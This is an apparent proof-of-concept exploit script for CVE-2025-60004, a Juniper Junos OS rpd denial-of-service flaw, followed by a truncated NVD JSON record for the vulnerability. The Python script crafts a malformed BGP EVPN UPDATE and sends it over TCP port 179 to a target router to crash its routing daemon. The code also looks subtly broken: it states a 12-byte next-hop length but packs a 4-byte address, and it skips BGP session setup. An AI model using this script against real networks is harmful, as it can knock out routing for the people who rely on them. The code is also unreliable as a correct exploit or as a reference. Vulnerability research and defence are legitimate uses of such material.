CVE-2025-60004

# CVE-2025-60004 PoC - Juniper Junos OS rpd DoS via Malicious BGP EVPN Update # This PoC demonstrates triggering an rpd crash by sending a crafted BGP EVPN update # Requires: scapy or similar packet crafting library, and an established BGP session from scapy.all import * from scapy.layers.inet import IP, TCP from scapy.contrib.bgp import BGPHeader, BGPUpdate, BGPNLRI import socket import struct TARGET_IP = "192.168.1.1" # Target Juniper device IP TARGET_PORT = 179 # BGP port LOCAL_IP = "10.0.0.1" # Local BGP peer IP LOCAL_PORT = 12345 # Local source port def craft_malicious_evpn_update(): """ Craft a malicious BGP UPDATE message containing a malformed EVPN NLRI that triggers improper exception handling in rpd, causing a crash. """ # BGP EVPN uses AFI 25 (L2VPN) and SAFI 70 (EVPN) evpn_afi = 25 evpn_safi = 70 # Build a malformed EVPN route with abnormal/exceptional conditions # EVPN Route Type 2 (MAC/IP Advertisement) with invalid length route_type = 0x02 # MAC/IP Advertisement route # Construct an intentionally malformed NLRI to trigger exception # Invalid RD (Route Distinguisher) length or malformed MAC length malformed_nlri = bytes([ route_type, # Route Type 0xFF, 0xFF, # Invalid length field (triggers exception) 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # RD (Route Distinguisher) 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, # Ethernet Segment ID 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # MAC Address (malformed) 0x00, # Invalid MAC length 0x00, 0x00, 0x00, 0x00, # IP Address 0x00, 0x00, 0x00, 0x00, # Labels ]) # Build BGP UPDATE message mp_reach_nlri = struct.pack('!BB', evpn_afi, evpn_safi) mp_reach_nlri += struct.pack('!B', 12) # Length of next hop (IPv4) mp_reach_nlri += socket.inet_aton(LOCAL_IP) # Next hop mp_reach_nlri += struct.pack('!B', 0) # Number of SNPAs mp_reach_nlri += struct.pack('!H', len(malformed_nlri)) # NLRI length mp_reach_nlri += malformed_nlri bgp_update = BGPUpdate() bgp_update.mp_reach_nlri = mp_reach_nlri return bytes(bgp_update) def send_malicious_update(): """Send the crafted BGP EVPN update to the target""" payload = craft_malicious_evpn_update() # Establish TCP connection to BGP port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((TARGET_IP, TARGET_PORT)) print(f"[+] Connected to {TARGET_IP}:{TARGET_PORT}") # Send BGP OPEN message (simplified - real attack requires established session) # In practice, attacker would need a configured BGP session print("[*] Sending malicious BGP EVPN UPDATE...") sock.send(payload) print(f"[+] Malicious EVPN update sent ({len(payload)} bytes)") print("[*] Target rpd should crash and restart, causing DoS") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": print("=" * 60) print("CVE-2025-60004 - Juniper Junos OS rpd DoS PoC") print("BGP EVPN Malformed Update Attack") print("=" * 60) send_malicious_update()

{"cve": {"id": "CVE-2025-60004", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:03.673", "lastModified": "2026-01-23T19:38:03.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-Of-Service (DoS).\n\nWhen an affected system receives a specific BGP EVPN update message over an established BGP session, this causes an rpd crash and restart.\n\nA BGP EVPN configuration is not necessary to be vulnerable. If peers are not configured to send BGP EVPN updates to a vulnerable device, then this issue can't occur.\n\nThis issue affects iBGP and eBGP, over IPv4 and IPv6.\n\n\nThis issue affects:\nJunos OS:\n * 23.4 versions from \n\n23.4R2-S3 before 23.4R2-S5,\n * 24.2 versions from \n\n24.2R2 \n\nbefore 24.2R2-S1,\n * 24.4 versions before 24.4R1-S3, 24.4R2;\n\n\n\nJunos OS Evolved:\n * 23.4-EVO versions from 23.4R2-S2-EVO before 23.4R2-S5-EVO,\n * 24.2-EVO versions from 24.2R2-EVO before 24.2R2-S1-EVO,\n * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "A7C207E3-0252-4192-8E8C-E2ED2831B4F4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s4:*:*:*:*:*:*", "matchCriteriaId": "E6974492-FE69-4340-8881-61C3329C1545"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.2:r2:*:*:*:*:*:*", "matchCriteriaId": "266B520A-482A-43F7-90F8-B9D64D30034F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:-:*:*:*:*:*:*", "matchCriteriaId": "C452BDCB-34E3-42D3-8909-2312356EB70A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r1:*:*:*:*:*:*", "matchCriteriaId": "2B8158F2-2028-40E9-955F-CFD581A32F60"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "1A7233A1-EC7A-4458-9AE1-835480A03A21"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:24.4:r2:*:*:*:*:*:*", "matchCriteriaId": "0EEF1798-F3C2-4645-96E7-1E82368B184D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EB2FE5FE-0ADE-406E-A23D-FDCC104B2496"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "2E58987A-D7B7-4FFF-9969-E8FD76AE2BE3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r2-s4:*:*:*:*:*:*", "matchCriteriaId": "E779C0D4-A8F7-4976-B3C8-B9802B96E715"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolv ... (truncated)